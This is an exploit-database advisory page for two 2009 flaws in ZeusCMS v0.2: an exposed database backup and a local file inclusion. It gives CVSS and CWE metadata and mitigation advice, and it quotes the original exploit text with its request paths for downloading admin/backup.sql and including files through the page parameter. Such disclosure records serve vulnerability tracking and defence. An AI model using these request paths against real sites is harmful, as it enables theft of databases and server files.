header-logo
Suggest Exploit
vendor:
ZeusCMS
by:
ViRuSMaN
7,5
CVSS
HIGH
Database Backup Dump and Local File Include
94, 98
CWE
Product Name: ZeusCMS
Affected Version From: v0.2
Affected Version To: v0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities

ZeusCMS is yet another Content Management System which is vulnerable to Database Backup Dump and Local File Include. An attacker can download the backup.sql file from the target website and can also include local files using the Local File Include vulnerability.

Mitigation:

Input validation should be done to prevent SQL injection and Local File Inclusion attacks. Access to the backup.sql file should be restricted.
Source

Exploit-DB raw data:

==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ ZeusCMS ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ ZeusCMS is yet another Content Management System ]
    [»] Download:           [ http://sourceforge.net/projects/zeuscms/files/ZeusCMS%20v0.2/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Database Backup Dump ]===

    [»] http://[target].com/[path]/admin/backup.sql


===[ Local File Include ]===

    [»] http://[target].com/[path]/index.php?page=[LFI]


Author: ViRuSMaN <-

###########################################################################

Navigation

Suggest Exploit

Services By CQR